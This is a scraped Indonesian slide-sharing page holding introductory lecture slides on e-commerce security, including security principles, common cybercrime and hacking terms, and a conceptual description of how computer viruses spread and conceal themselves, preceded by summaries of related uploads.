Dokumen tersebut membahas tentang keamanan dalam e-commerce, termasuk berbagai ancaman keamanan seperti penipuan, pencurian data, virus komputer, dan teknik-teknik hacking seperti denial of service dan sniffer. Dibahas pula berbagai aspek keamanan seperti kerahasiaan, integritas, ketersediaan, otentikasi, kontrol akses, dan non-repudiasi dalam transaksi online.
Modul 1 - Pendahuluan Keamanan Jaringan Komputerjagoanilmu
Modul 1 membahas tentang pendahuluan keamanan jaringan komputer. Terdapat beberapa poin penting yaitu definisi keamanan jaringan komputer yang mencegah penyerang mencapai tujuan melalui akses tidak sah atau penggunaan tidak sah komputer dan jaringan. Modul ini juga menjelaskan ancaman terhadap keamanan jaringan seperti kehilangan informasi rahasia, serangan dari internet, serta kerugian yang ditimbulkan. Statistik keja
Digital Safety - Mengenal Fitur Proteksi Perangkat DigitalFajar Muharom
Pilar Literasi Digital Keamanan Digital - Mengenal Fitur Proteksi Perangkat Digital.
Materi ini dipresentasikan dalam kegiatan Webinar Program Gerakan Literasi Digital Nasional, Kemenkominfo dan Siberkreasi.
Dokumen tersebut membahas tentang keamanan digital di era siber. Topik utama yang dibahas adalah tren teknologi terkini seperti IoT, smart city, smart car dan smart home, ancaman serangan siber, pelaku serangan siber, dan solusi untuk meningkatkan keamanan digital.
Modul 1 - Pendahuluan Keamanan Jaringan Komputerjagoanilmu
Modul 1 membahas tentang pendahuluan keamanan jaringan komputer. Terdapat beberapa poin penting yaitu definisi keamanan jaringan komputer yang mencegah penyerang mencapai tujuan melalui akses tidak sah atau penggunaan tidak sah komputer dan jaringan. Modul ini juga menjelaskan ancaman terhadap keamanan jaringan seperti kehilangan informasi rahasia, serangan dari internet, serta kerugian yang ditimbulkan. Statistik keja
Digital Safety - Mengenal Fitur Proteksi Perangkat DigitalFajar Muharom
Pilar Literasi Digital Keamanan Digital - Mengenal Fitur Proteksi Perangkat Digital.
Materi ini dipresentasikan dalam kegiatan Webinar Program Gerakan Literasi Digital Nasional, Kemenkominfo dan Siberkreasi.
Dokumen tersebut membahas tentang keamanan digital di era siber. Topik utama yang dibahas adalah tren teknologi terkini seperti IoT, smart city, smart car dan smart home, ancaman serangan siber, pelaku serangan siber, dan solusi untuk meningkatkan keamanan digital.
Dokumen tersebut membahas tentang keamanan informasi secara umum, meliputi definisi keamanan informasi, topik yang tercakup, siklus keamanan informasi (pencegahan, perlindungan, deteksi, respons), pentingnya keamanan informasi, tantangan keamanan informasi saat ini seperti peningkatan serangan siber, dan ancaman utama seperti pencurian identitas, malware, dan kegagalan patch manajemen.
Dokumen tersebut membahas pentingnya keamanan jaringan komputer dan informasi. Beberapa topik yang dibahas adalah ancaman terhadap keamanan sistem informasi, teknik pengamanan jaringan komputer seperti kriptografi dan infrastruktur kunci publik, serta alat untuk mengamankan jaringan.
Makin berkembangnya Jaringan TIK di Indonesia pada umumnya dan di Bandung pada khususnya.
Sejak era tahun 90 an, telah dikembangkan pemikiran Bandung High Technology Valley, sampai sekitar 2012 dikembangkan Bandung Digital Valley, sehingga TIK sangat berkembang di Bandung.
TIK telah digunakan untuk berbagai aktivitas pribadi, bisnis, pemerintahan dsb, sehingga cukup banyak data yang perlu dilindungi.
Maraknya issue Intersepsi/Penyadapan, Hacking dsb sehingga masalah keamanan merupakan issue Nasional bahkan Global.
Dokumen tersebut membahas tentang keamanan sistem informasi dan berbagai ancaman terhadapnya, termasuk cara serangan, sumber lubang keamanan, dan cara pengamanan. Dibahas pula klasifikasi kejahatan komputer dan aspek-aspek keamanan seperti privasi, integritas, otentikasi, dan ketersediaan.
Jaringan komputer dan keamanan data membahas tentang sistem jaringan komputer, konsep keamanan data, dan aspek-aspek keamanan data seperti kerahasiaan, integritas, otentikasi, ketersediaan, kontrol akses, dan non-repudiasi serta berbagai ancaman keamanan seperti serangan interupsi, intersepsi, modifikasi, dan fabrikasi serta penyebab kelemahan sistem seperti salah desain, konfigurasi, implementasi, dan kebijak
Materi Cyber crime ini diperuntukkan bagi mahasiswa yang sedang mempelajari matakuliah Etika Profesi. Dalam materi ini akan dijelaskan mengenai kejahatan-kejahatan dalam bidang komputer atau IT, kasus apa saja yang pernah terjadi di Indonesia, cara penanggulangganya dan lain sebagainya.
Dokumen tersebut membahas masalah etika dalam pengembangan sistem informasi yang mencakup privasi, akurasi, properti, dan akses. Juga dibahas mengenai ancaman terhadap sistem informasi seperti bencana alam, kesalahan manusia, kegagalan perangkat keras dan lunak, serta kecurangan dan kejahatan komputer seperti hacking dan pembajakan.
Dokumen tersebut membahas tentang digital forensic yang merupakan cabang ilmu komputer khususnya terkait teori keamanan teknologi informasi untuk menganalisis barang bukti digital agar dapat dipertanggungjawabkan di pengadilan, termasuk tahap-tahap pengumpulan, pelestarian, penyaringan dan penyajian bukti digital."
Dokumen ini membahas mengenai pembobolan bank berbasis teknologi informasi. Penggunaan teknologi informasi di bank semakin meningkat namun juga meningkatkan risiko kejahatan siber. Pembobolan dapat dilakukan oleh pihak internal maupun eksternal dengan menggunakan berbagai metode seperti internet banking palsu, skimming data nasabah, dan menyadap jaringan komunikasi. Dokumen ini juga memberikan rekomendasi perlindungan seperti otentik
Dokumen tersebut membahas tentang etika profesi teknologi informasi dan komunikasi. Isinya meliputi penjelasan cybercrime beserta karakteristik dan klasifikasinya, cyber law, contoh kasus data forgery beserta faktor pendukungnya, cara mencegahnya, contoh kasus data forgery pada e-banking BCA, dan undang-undang terkait.
Dokumen tersebut membahas tentang keamanan sistem informasi dan cara-cara untuk mencegah gangguan dan ancaman terhadap sistem informasi. Beberapa poin penting yang diangkat antara lain kerentanan sistem informasi terhadap ancaman dari luar maupun dalam perusahaan, serta langkah-langkah seperti menggunakan firewall, antivirus, enkripsi data, dan otentikasi pengguna untuk memproteksi sistem informasi dan sumber dayanya.
Dokumen tersebut membahas manfaat dan cara menerapkan sistem keamanan komputer, serta ancaman yang perlu diwaspadai seperti sniffing, spoofing, brute force, dan virus. Dibahas pula aspek-aspek keamanan komputer seperti privasi, kerahasiaan, integritas, otentikasi, dan ketersediaan. Langkah-langkah keamanan komputer dan pengendalian sistem informasi juga dijelaskan.
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...febyratnasari
Tiga teknik utama untuk meningkatkan keamanan sistem informasi adalah mengatur akses, memilih password yang kuat, dan memasang perangkat lunak proteksi seperti firewall. Hal ini bertujuan untuk mencegah akses yang tidak sah, menjaga kerahasiaan data, dan memastikan integritas sistem.
Dokumen tersebut membahas tentang keamanan informasi secara umum, meliputi definisi keamanan informasi, topik yang tercakup, siklus keamanan informasi (pencegahan, perlindungan, deteksi, respons), pentingnya keamanan informasi, tantangan keamanan informasi saat ini seperti peningkatan serangan siber, dan ancaman utama seperti pencurian identitas, malware, dan kegagalan patch manajemen.
Dokumen tersebut membahas pentingnya keamanan jaringan komputer dan informasi. Beberapa topik yang dibahas adalah ancaman terhadap keamanan sistem informasi, teknik pengamanan jaringan komputer seperti kriptografi dan infrastruktur kunci publik, serta alat untuk mengamankan jaringan.
Makin berkembangnya Jaringan TIK di Indonesia pada umumnya dan di Bandung pada khususnya.
Sejak era tahun 90 an, telah dikembangkan pemikiran Bandung High Technology Valley, sampai sekitar 2012 dikembangkan Bandung Digital Valley, sehingga TIK sangat berkembang di Bandung.
TIK telah digunakan untuk berbagai aktivitas pribadi, bisnis, pemerintahan dsb, sehingga cukup banyak data yang perlu dilindungi.
Maraknya issue Intersepsi/Penyadapan, Hacking dsb sehingga masalah keamanan merupakan issue Nasional bahkan Global.
Dokumen tersebut membahas tentang keamanan sistem informasi dan berbagai ancaman terhadapnya, termasuk cara serangan, sumber lubang keamanan, dan cara pengamanan. Dibahas pula klasifikasi kejahatan komputer dan aspek-aspek keamanan seperti privasi, integritas, otentikasi, dan ketersediaan.
Jaringan komputer dan keamanan data membahas tentang sistem jaringan komputer, konsep keamanan data, dan aspek-aspek keamanan data seperti kerahasiaan, integritas, otentikasi, ketersediaan, kontrol akses, dan non-repudiasi serta berbagai ancaman keamanan seperti serangan interupsi, intersepsi, modifikasi, dan fabrikasi serta penyebab kelemahan sistem seperti salah desain, konfigurasi, implementasi, dan kebijak
Materi Cyber crime ini diperuntukkan bagi mahasiswa yang sedang mempelajari matakuliah Etika Profesi. Dalam materi ini akan dijelaskan mengenai kejahatan-kejahatan dalam bidang komputer atau IT, kasus apa saja yang pernah terjadi di Indonesia, cara penanggulangganya dan lain sebagainya.
Dokumen tersebut membahas masalah etika dalam pengembangan sistem informasi yang mencakup privasi, akurasi, properti, dan akses. Juga dibahas mengenai ancaman terhadap sistem informasi seperti bencana alam, kesalahan manusia, kegagalan perangkat keras dan lunak, serta kecurangan dan kejahatan komputer seperti hacking dan pembajakan.
Dokumen tersebut membahas tentang digital forensic yang merupakan cabang ilmu komputer khususnya terkait teori keamanan teknologi informasi untuk menganalisis barang bukti digital agar dapat dipertanggungjawabkan di pengadilan, termasuk tahap-tahap pengumpulan, pelestarian, penyaringan dan penyajian bukti digital."
Dokumen ini membahas mengenai pembobolan bank berbasis teknologi informasi. Penggunaan teknologi informasi di bank semakin meningkat namun juga meningkatkan risiko kejahatan siber. Pembobolan dapat dilakukan oleh pihak internal maupun eksternal dengan menggunakan berbagai metode seperti internet banking palsu, skimming data nasabah, dan menyadap jaringan komunikasi. Dokumen ini juga memberikan rekomendasi perlindungan seperti otentik
Dokumen tersebut membahas tentang etika profesi teknologi informasi dan komunikasi. Isinya meliputi penjelasan cybercrime beserta karakteristik dan klasifikasinya, cyber law, contoh kasus data forgery beserta faktor pendukungnya, cara mencegahnya, contoh kasus data forgery pada e-banking BCA, dan undang-undang terkait.
Dokumen tersebut membahas tentang keamanan sistem informasi dan cara-cara untuk mencegah gangguan dan ancaman terhadap sistem informasi. Beberapa poin penting yang diangkat antara lain kerentanan sistem informasi terhadap ancaman dari luar maupun dalam perusahaan, serta langkah-langkah seperti menggunakan firewall, antivirus, enkripsi data, dan otentikasi pengguna untuk memproteksi sistem informasi dan sumber dayanya.
Dokumen tersebut membahas manfaat dan cara menerapkan sistem keamanan komputer, serta ancaman yang perlu diwaspadai seperti sniffing, spoofing, brute force, dan virus. Dibahas pula aspek-aspek keamanan komputer seperti privasi, kerahasiaan, integritas, otentikasi, dan ketersediaan. Langkah-langkah keamanan komputer dan pengendalian sistem informasi juga dijelaskan.
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...febyratnasari
Tiga teknik utama untuk meningkatkan keamanan sistem informasi adalah mengatur akses, memilih password yang kuat, dan memasang perangkat lunak proteksi seperti firewall. Hal ini bertujuan untuk mencegah akses yang tidak sah, menjaga kerahasiaan data, dan memastikan integritas sistem.
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)Rio Gunawan
Dokumen tersebut membahas perlindungan sistem informasi dengan fokus pada kerentanan sistem, pengendalian risiko, dan teknologi untuk melindungi sumber daya informasi. Topik utama mencakup ancaman terhadap sistem informasi perusahaan, kerangka kerja keamanan, dan cara melindungi perangkat mobile perusahaan.
Menjelaskan tentang sistem perlindungan sistem informasi.ApriliaNingrum2
Dokumen tersebut membahas perlindungan sistem informasi dengan fokus pada kerentanan sistem, pengamanan sistem, dan teknologi untuk melindungi sumber daya informasi. Beberapa poin kunci meliputi penyebab kerentanan sistem, ancaman terhadap sistem informasi perusahaan, dan langkah-langkah untuk membangun kerangka kerja pengamanan seperti manajemen identitas, firewall, dan enkripsi data.
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)RifaldySaputra1
Dokumen tersebut membahas tentang perlindungan sistem informasi, termasuk kerentanan sistem, penyebab kerentanan, tantangan pengamanan, dan teknologi untuk melindungi sumber daya informasi seperti firewall, antivirus, enkripsi, dan manajemen identitas. Dokumen tersebut juga membahas kerangka kerja pengamanan dan studi kasus tentang serangan terhadap jaringan KPU serta pengamanan perangkat seluler di Unilever.
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...Ensign Handoko
Ringkasan dokumen tersebut adalah:
1. Dokumen tersebut membahas tentang keamanan dan privasi data pengguna di era digital dan fintech
2. Ada beberapa ancaman keamanan siber seperti phising dan hacking yang sering menargetkan data finansial pengguna
3. Pemerintah Indonesia telah mengeluarkan peraturan seperti RUU PDP untuk melindungi privasi dan keamanan data pribadi pengguna.
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...Riskyyoni
Dokumen tersebut membahas tentang keamanan sistem informasi, termasuk ancaman seperti hacker, cracker, virus, dan cara mengatasinya. Dijelaskan pula berbagai alat deteksi kecurangan dan perangkat lunak untuk meningkatkan keamanan sistem informasi.
Dokumen tersebut membahas tentang keamanan sistem informasi, meliputi pengertian keamanan sistem informasi, ancaman terhadap sistem informasi, cara mengamankan sistem informasi seperti pengendalian akses, penggunaan enkripsi, dan pengamanan fisik perangkat lunak.
Pertemuan-11_Keamanan-Sistem-Komputer.pdf
pertemuan keamanan sistem komputer sangat lah dibutuhkan, karna kita selalu menggunakan komputer disetiap hari nya, oleh karna itu teknologi keamanan ini sangat penting
Dokumen tersebut membahas tentang session hijacking pada sistem keamanan komputer. Session hijacking adalah pengambilalihan sesi aplikasi web milik pengguna lain dengan mendapatkan ID sesi mereka, biasanya melalui cookies. Dokumen tersebut juga membahas berbagai aspek keamanan komputer seperti social engineering, serangan jaringan, dan cara-cara pencegahannya seperti enkripsi dan firewall.
1. Cara mencegah dan menanggulangi apabila Sistem Informasi atau komputer mengalami hal ini.
2. Sistem Informasi bisa menjadi sangat rentan akan hal-hal yang tidak di inginkan, jelaskan statement ini dan beri contoh serta cara mencegah dan mengatasinya.
Cara mencegah dan menanggulangi apabila Sistem Informasi atau komputer mengalami gangguan Hacker, virus atau lainnnya baik yang bersifat mengganggu aktivitas sistem secara langsung atau merusah data/file pada komputer/sistem informasi.
Paper ini bertujuan untuk menganalisis pencemaran udara akibat pabrik aspal. Analisis ini akan fokus pada emisi udara yang dihasilkan oleh pabrik aspal, dampak kesehatan dan lingkungan dari emisi tersebut, dan upaya yang dapat dilakukan untuk mengurangi pencemaran udara
Modul Ajar Bahasa Indonesia Kelas 7 Fase D Kurikulum Merdeka - [abdiera.com]Fathan Emran
Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka - abdiera.com. Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka. Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka. Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka. Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka. Modul Ajar Bahasa Indonesia Kelas 7 SMP/MTs Fase D Kurikulum Merdeka.
Ppt landasan pendidikan Pai 9 _20240604_231000_0000.pdffadlurrahman260903
Ppt landasan pendidikan tentang pendidikan seumur hidup.
Prodi pendidikan agama Islam
Fakultas tarbiyah dan ilmu keguruan
Universitas Islam negeri syekh Ali Hasan Ahmad addary Padangsidimpuan
Pendidikan sepanjang hayat atau pendidikan seumur hidup adalah sebuah system konsepkonsep pendidikan yang menerangkan keseluruhan peristiwa-peristiwa kegiatan belajarmengajar yang berlangsung dalam keseluruhan kehidupan manusia. Pendidikan sepanjang
hayat memandang jauh ke depan, berusaha untuk menghasilkan manusia dan masyarakat yang
baru, merupakan suatu proyek masyarakat yang sangat besar. Pendidikan sepanjang hayat
merupakan asas pendidikan yang cocok bagi orang-orang yang hidup dalam dunia
transformasi dan informasi, yaitu masyarakat modern. Manusia harus lebih bisa menyesuaikan
dirinya secara terus menerus dengan situasi yang baru.
Modul Ajar Bahasa Inggris Kelas 10 Fase E Kurikulum MerdekaFathan Emran
Modul Ajar Bahasa Inggris Kelas 10 SMA/MA Fase E Kurikulum Merdeka - abdiera.com. Modul Ajar Bahasa Inggris Kelas 10 SMA/MA Fase E Kurikulum Merdeka. Modul Ajar Bahasa Inggris Kelas 10 SMA/MA Fase E Kurikulum Merdeka.
Universitas Negeri Jakarta banyak melahirkan tokoh pendidikan yang memiliki pengaruh didunia pendidikan. Beberapa diantaranya ada didalam file presentasi
2. Aspek Keamanan E – Commerce
KONSEP DASAR KEAMANAN E-COMMERCE
COMPUTER CRIME
adalah istilah yang mengacu kepada aktivitas kejahatan
dengan komputer atau jaringan komputer menjadi alat,
sasaran atau tempat terjadinya kejahatan.
Termasuk ke dalam kejahatan dunia maya antara lain adalah
Penipuan dan pemalsuan (kartu Kredit,lelang,identitas, dll)
Pencurian data
Pengiriman virus
Pornografi,
dll
3. Hal – Hal yang menyebabkan Bekembangnya
KEJAHATAN ON LINE
1. Aplikasi bisnis berbasis teknologi informasi & jaringan
semakin meningkat
2. Desentralisasi server
3. Transisi dari single vendor ke Multi vendor
4. Meningkatnya kemampuan pemakai di bidang
komputer
5. Mudahnya memperoleh sofware untuk menyerang
komputer dan jaringan
6. Kesulitan dari penegak hukum untuk mengejar pelaku
di dunia komputer & telekomunikasi
4. INFORMATION SECURITY
– Keamanan Informasi merupakan bagian
terpenting dari E-Commerce
– Sistem Keamanan informasi memiliki empat
macam tujuan yang sangat mendasar :
1. Confidentiality
2. Intergrity
3. Availability
4. Authentication
5. Confidentiality
• Kerahasiaan, usaha menjaga informasi dari orang
yang tidak berhak
• Menjamin apakah informasi yang dikirim tersebut
tidak dapat dibuka atau diketahui oleh orang yang
tidak berhak
Integrity
• Menjamin pengguna yang sah bisa mengakses
informasi sumber miliknya sendiri
• Orang yang tidak berhak ditolak untuk mengakses
informasi
• Enkripsi dan Digital Signature
6. Integrity menjamin konsistensi data, informasi
tidak boleh diubah seijin pemilik informasi
1. Keaslian Data
2. Keutuhan Data
3. Penduplikatan data
7. Availability
• Ketersediaan Informasi ketika dibutuhkan
• Sistem Infomasi yang diserang atau dijebol dapat
menghambat informasi ketika dibutuhkan
• DoS (Denial of service attack),
• Pembanjiran permintaan pada server
• Mailbomb
8. Authentication/Legitimate Use
• Metode yang menyatakan bahwa informasi
betul-betul asli
• Orang yang mengakses atau memberikan
informasi betul spt yang dimaksud
• Keaslian Dokumen : Watermaking, digital
signature
9. Aspek Keamanan E-Commerce
Dua aspek berkaitan dengan keamanan E-commerce
:
1. Acces Control
2. Non-repudiation
10. Access Control
• Pengaturan akses kepada informasi
• Mekanisme Klasifikasi Pengguna
( Public,Privat,Confidental, top secret
User (guest atau admin))
Ada 3 hal access kontrol :
1. What You Have (Kartu Id, ATM)
2. What You Know (Pasword,PIN)
3. What You Are (Sidik Jari, biometric)
11. Non Repudiation
Seseorang tidak menyangkal telah
melakukan transaksi
Digital Signature Certifiates (tanda tangan
digital), Tekonologi Kriptografi (merubah
huruf menjadi simbol tertentu)
(SSL Server (Enkripsi Secure Socket Layer)
melindungi komunikasi transaksi kartu kredit
12. 2 BIDANG UNTUK PENERAPAN DAN
MENCAPAI TEKNOLOGI KEAMANAN
INFORMASI
1. Sistem Keamanan Komunikasi
Merupakan perlindungan terhadap informasi
ketika dikirim dari sebuah sistem ke sistem
lainnya
2. Sistem Keamanan Komputer
Perlindungan terhadap sistem informasi komputer
itu sendiri meliputi keamanan perangkat lunak
sistem operasi, keamanan terhadap perangkat lunak
manajemen database komputer
13. CONTOH SERVICE KEAMANAN MEKANISME
NON ELEKTONIK
• Authentication > Indentitas diri,foto
• Access Control >Checkpoint guard
• Confidentiality > Surat tersegel, Tinta yang tidak
terlihat
• Intergrity > Data Tidak dpt dihapus,Hologram
• Non-Repudiation > Tanda tangan Notaris, Surat
teregistrasi
14. FAKTOR KEAMANAN LAINNYA
Keamanan secara fisik
• Penjaga keamanan, pintu terkunci, sistem kontrol dll
• Keamanan personal
• Kepribadian & tanggung jawab personal
• Keamanan administratif
• Kontrol terhadap perangkat lunak yang digunakan
• Keamanan media yang digunakan
• Media security terhadap media penyimpanan
15. > Security Policy
• Faktor yang mendasar untuk keamanan
komunikasi E-commerce
> Authorization
• Kebijakan keamanan yang digunakan,
merupakan set aturan dalam security domain
16. OTORISASI BAGIAN DARI SECURITY POLICY BERUPA
PEMBERIAN KEGIATAN SECARA HUKUM UNTUK
MELAKUKAN SEGALA AKTIVITAS
• Accountability (Akses personal security)
• A Threat (Ancaman yang tidak diinginkan)
• An Attack
(Serangan dari ancaman (pasive attack, active
attack)
• Safeguards
Pengamanan kontrol fisik, mekanisme,kebijakan &
prosedur melindungi informasi
• Vulnerabilities
Lubang celah kemanan yang mudah ditembus
• Risk Analysis (Resiko Kerugian)
17. THREATS (ANCAMAN)
• System Penetration
Orang yang tidak berhak mendapat akses ke sistem
• Authorization Violation
Pelanggaran penyalahgunaan wewenang legal
• Planting
Future attack, serangan kesistem yang tidak dilakukan secara langsung
• Communications Monitoring
• Denial of service
Akses service user dihalangi
• Reduption
Penolakan terhadap sebuah aktifitas transaksi
18. Cyber Crime
1. Typosite,
membuat situs palsu yang penampilannya sama dengan situs
aslinya,dengan harapan korban salah mengetik alamat bank resmi
sehingga melakukan transaksi online banking di situs miliknya.
2. Key Logger,
sebuah cara mengunci tombol keyboard dengan menggunakan
program logger tertentu sehingga jejak pengguna setiap kali
memencet tombol dapat terekam di komputer.
3. Cookies/Pathfinder,
sebuah program yang bisa menampilkan kembali apa saja yang
telah diketik seseorang (mirip dengan key logger).
4. Magnetic Card Reader,
suatu alat yang bisa digunakan untuk membaca informasi apa saja
pada sebuah kartu, baik kartu kredit, debet, maupun cash.
Biasanya terjadi pada orang yang kehilangan kartunya.
24. MASA DEPAN E – COMMERCE
Perkembangan E-Commerce di Indonesia
Di dalam perkembangan E-Commerce di Indonesia, memiliki tantangan
- tantangan, diantaranya yaitu :
1. Kultur
• Masyarakat Indonesia, yang masih belum terbiasa dalam
berbelanja dengan katalog.
• Masih harus melihat secara fisik atau memegang barang yang
akan dijual.
• Masih senang menawar harga yang dijual.
2. Kepercayaan
• Kepercayaan antara penjual dan pembeli masih tipis.
• Kepercayaan kepada pembayaran elektronik masih kurang.
• Penggunaan masih jarang.
25. MASA DEPAN E-COMMERCE ?
Tampaknya e-commerce mempunyai masa depan
yang cerah. Jika berbagai detail dari perdagangan
online ini dapat diselesaikan maka bukan mustahil
e-commerce dan Internet akan mengubah struktur
dunia usaha secara global. Dengan
perkembangan masyarakat virtual yang demikian
besar - banyak orang yang berpartisipasi dalam
berbagai interest group online - memperlihatkan
pergeseran paradigma dari
kekuatan ekonomi yang bertumpu
pada pembuat / manufacturer ke
kekuatan pasar.
26. Paling tidak demikian yang dilihat oleh John Hagel
dan Arthur Armstrong, sepasang analis dari
McKinsey http://www.mckinsey.com/ sebuah
perusahaan konsultan manajemen internasional.
ParentsPlace http://www.parentsplace.com/
merupakan tempat pertemuan para orang tua
yang akhirnya memberikan kesempatan pada
vendor-vendor kecil untuk mencapai pelanggan
potensial mereka untuk produk yang sangat
spesifik seperti makanan bayi dan shampo.
27. BASIS IMPLEMENTASI E-COMMERCE
BAGI WIRAUSAHAWAN
• Mempunyai produk untuk dijual.
• Mempunyai moralitas dan motivasi diri : jujur,
positif, sabar, komprehensif, rasional, energik,
visi dan misi.
• Harus mempunyai infrastruktur internet,
komputer dan website (gratis/berbayar).
• Manajemen administrasi dan akutansi : punya
metode pembayaran melalui bank, paypal,
western union, dll, sistem purchase order,
invoicing, receipt dan good accounting.
28. • Mempunyai strategi Customer Support.
Berguna untuk proses transaksi dan
layanan after sales.
• Manajemen Quality Control, Packing dan
Ekpedisi. Untuk kontrol kualitas produk,
pengemasan dan pengiriman kepada
pembeli.
• Mempunyai strategi Internet Marketing
(IM). Berguna untuk marketing, public
relation dan branding.
• Mempunyai jiwa spiritual dan sosial.
30. Akses
• Fokus dari masalah akses adalah pada
penyediaan akses untuk semua kalangan.
• Teknologi informasi diharapkan tidak
menjadi halangan dalam melakukan
pengaksesan terhadap informasi bagi
kelompok orang tertentu.
31. Keamanan
• Perlindungan terhadap informasi dan
sistem informasi dari akses, penggunaan,
pengungkapan, kerusakan, gangguan,
atau modifikasi yang tidak sah.
• Ancaman terhadap sistem informasi dibagi
menjadi 2 yaitu :
–Ancaman aktif
–Ancaman pasif
32. Keamanan
• Ancaman aktif meliputi kecurangan,
penipuan dan kejahatan terhadap
komputer.
• Ancaman pasif meliputi kegagalan sistem,
kesalahan manusia, dan bencana alam.
33. Teknik hacking - Denial of service
Teknik ini dilakukan dengan cara
membuat permintaan yang sangat banyak
terhadap suatu situs sehingga sistem
menjadi macet, dan kemudian dengan
mencari kelemahan sistem, pelaku
melakukan serangan terhadap sistem.
34. Teknik hacking - Sniffer
• Teknik ini dilakukan dengan membuat
program yang dapat melacak paket data
seseorang ketika paket tersebut melintasi
internet, menangkap password atau
isinya.
35. Teknik hacking - Spoofing
Pemalsuan alamat email atau web dengan
tujuan menjebak pemakai agar
memasukkan informasi yang penting
seperti password atau nomor kartu kredit.
36. Teknik hacking - Logic bomb dan
time bomb
Program yang beraksi karena dipicu
oleh suatu kejadian atau setelah
selang waktu tertentu.
37. Teknik hacking - Virus
• Program komputer yang dapat
menggandakan atau menyalin dirinya
sendiri dan menyebar dengan cara
menyisipkan salinan dirinya ke dalam
program atau dokumen lain.
• Virus komputer dapat dianalogikan
dengan virus biologis yang menyebar dengan
cara menyisipkan dirinya sendiri ke sel
makhluk hidup.
• Virus komputer dapat merusak (misalnya
dengan merusak data pada dokumen),
membuat pengguna komputer merasa
terganggu, maupun tidak menimbulkan efek
sama sekali.
38. • Virus komputer umumnya dapat
merusak perangkat lunak komputer dan tidak
dapat secara langsung merusak perangkat
keras komputer tetapi dapat mengakibatkan
kerusakan dengan cara memuat program yang
memaksa over process ke perangkat tertentu.
• Efek negatif virus komputer adalah
memperbanyak dirinya sendiri, yang membuat
sumber daya pada komputer (seperti
penggunaan memori) menjadi berkurang secara
signifikan.
• Hampir 95% virus komputer berbasis sistem
operasi Windows. Sisanya menyerang
Linux/GNU, Mac, FreeBSD, OS/2IBM, dan Sun
Operating System.
• Virus yang ganas akan merusak perangkat
keras.
39. KRITERIA VIRUS KOMPUTER
1. Kemampuan untuk mendapatkan informasi
2. Kemampuannya untuk memeriksa suatu
program
3. Kemampuannya untuk menggandakan diri
dan menularkan
4. Kemampuannya melakukan manipulasi
5. Kemampuannya untuk menyembunyikan diri
40. • KEMAMPUAN UNTUK MENDAPATKAN INFORMASI
Pada umumnya suatu virus memerlukan daftar nama-nama
file yang ada dalam suatu directory, agar dia
dapat mengenali program program apa saja yang akan
dia tulari,semisal virus makro yang akan menginfeksi
semua file berekstensi *.doc setelah virus itu
menemukannya, disinilah kemampuan mengumpulkan
informasi itu diperlukan agar virus dapat membuat
daftar/data semua file, terus memilahnya dengan
mencari file-file yang bisa ditulari.Biasanya data ini
tercipta saat program yang tertular/terinfeksi atau
bahkan program virus ini dieksekusi. Sang virus akan
segera melakukan pengumpulan data dan menaruhnya
di RAM, sehingga apabila komputer dimatikan semua
data hilang tetapi akan tercipta setiap program bervirus
dijalankan dan biasanya dibuat sebagai hidden file oleh
virus .
41. • KEMAMPUAN MEMERIKSA SUATU PROGRAM
Suatu virus juga harus bisa untuk memeriksa
suatu program yang akan ditulari, misalnya ia
bertugas menulari program berekstensi *.doc,
dia harus memeriksa apakah file dokumen ini
telah terinfeksi ataupun belum, karena jika
sudah terinfeksi, maka dia akan percuma
menularinya 2 kali. Ini sangat berguna untuk
meningkatkan kemampuan suatu virus dalam
hal kecepatan menginfeksi suatu file/program.
Yang umum dilakukan oleh virus adalah
memiliki/ memberi tanda pada file/program yang
telah terinfeksi sehingga mudah untuk dikenali
oleh virus tersebut . Contoh penandaan adalah
misalnya memberikan suatu byte yang unik
disetiap file yang telah terinfeksi.
42. • KEMAMPUAN UNTUK MENGGANDAKAN DIRI
Inti dari virus adalah kemampuan
mengandakan diri dengan cara menulari
program lainnya. Suatu virus apabila telah
menemukan calon korbannya (baik file atau
program) maka ia akan mengenalinya dengan
memeriksanya, jika belum terinfeksi maka sang
virus akan memulai aksinya untuk menulari
dengan cara menuliskan byte pengenal pada
program/file tersebut, dan seterusnya
mengcopikan/menulis kode objek virus diatas
file/program yang diinfeksi. Beberapa cara
umum yang dilakukan oleh virus untuk
menulari/ menggandakan dirinya adalah:
43. a. File/Program yang akan ditulari dihapus
atau diubah namanya, kemudian diciptakan
suatu file menggunakan nama itu dengan
menggunakan virus tersebut (maksudnya
virus mengganti namanya dengan nama file
yang dihapus).
b. Program virus yang sudah di
eksekusi/load ke memori akan langsung
menulari file-file lain dengan cara
menumpangi seluruh file/program yang
ada.
44. • KEMAMPUAN MENGADAKAN MANIPULASI
Rutin (routine) yang dimiliki suatu virus akan
dijalankan setelah virus menulari suatu
file/program. Isi dari suatu rutin ini dapat
beragam mulai dari yang teringan sampai
pengrusakan. Rutin ini umumnya digunakan
untuk memanipulasi program ataupun
mempopulerkan pembuatnya. Rutin ini
memanfaatkan kemampuan dari suatu
sistem operasi (Operating System) ,
sehingga memiliki kemampuan yang
sama dengan yang dimiliki sistem operasi.
45. • KEMAMPUAN MENYEMBUNYIKAN DIRI
Kemampuan Menyembunyikan diri ini harus dimiliki oleh
suatu virus agar semua pekerjaan baik dari awal sampai
berhasilnya penularan dapat terlaksana. Langkah-langkah
yang biasa dilakukan adalah:
- Program asli/virus disimpan dalam bentuk kode
mesin dan digabung dengan program lain yang
dianggap berguna oleh pemakai.
- Program virus diletakkan pada Boot Record atau
track yang jarang diperhatikan oleh komputer
itu sendiri.
- Program virus dibuat sependek mungkin, dan
hasil file yang diinfeksi tidak berubah ukurannya.
- Virus tidak mengubah keterangan waktu suatu
file, dll.
46. SIKLUS HIDUP VIRUS SECARA UMUM
MELALUI 4 TAHAP
• Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan
diaktifkan oleh suatu kondisi tertentu,
